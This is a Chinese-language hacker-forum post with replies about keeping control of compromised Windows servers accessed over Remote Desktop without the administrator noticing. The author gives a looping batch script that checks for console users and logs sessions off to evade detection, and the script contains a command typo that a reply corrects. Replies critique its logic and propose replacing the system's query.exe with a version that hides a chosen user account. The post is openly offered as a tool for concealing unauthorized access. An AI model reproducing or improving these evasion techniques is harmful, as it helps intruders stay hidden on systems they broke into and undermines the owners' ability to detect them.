我思故我在！

相信大家一定有自己的3389的肉机，可是你有没有想过，当你再登陆的时候也许管理员也再线呢？

如果是一个懂黑客技术的网管一定会用query user来察看终端登陆的用户，这样的话你的登陆就会暴露给管理员了，估计这样的话你的肉机用的时间也长不了了，今天无意见学习dos下的编程，想到了一个程序可以很方便的再管理员的眼皮底下溜走，下面给出这个程序

—————————————cut here—————————-

:begin

query user|fine “console”

if errorlevel 1 logoff 1&&logoff 2

goto begin

———————————–cut here———————————-

程序的原理很简单，就是只要有人用query user的时候就执行logoff，logoff的意思就是注销这个回话，当然管理员也就不会知道你登陆了，

查点忘记了，这个程序只要保存成.bat就行了，登陆一次执行一次。。。

有点bug
query user|fine “console”
应该是 find “console”

有个问题.这个是BAT,不是service
不可能监控系统.
只是每次执行的时候看看有没有用户通过控制台登陆.
所以以下功能
〉〉就是只要有人用query user的时候就执行logoff
是没法达到的.
他没有监控别人使用query user
而是自己query user
检测到有用户通过console登陆
就主动logoff出来
应该是加载在自己这个用户的登陆运行脚本里面使用.

还有一个问题
RADMIN之类的远程工具.在query出来都是通过console方式登陆的.
所以万一别人使用RADMIN之类远程登陆又不退出.
那么你这个用户就可能永远也登陆不进去了.

可能是原作者对于代码的理解有了偏差.
引申一下原作者想达到的目的.
做个简单的替换可能更方便.
直接写个QUERY命令的替换
query.exe位于system32下
用自己的程序替换一下.
每次管理员query的时候.
不显示特定用户.嘿嘿…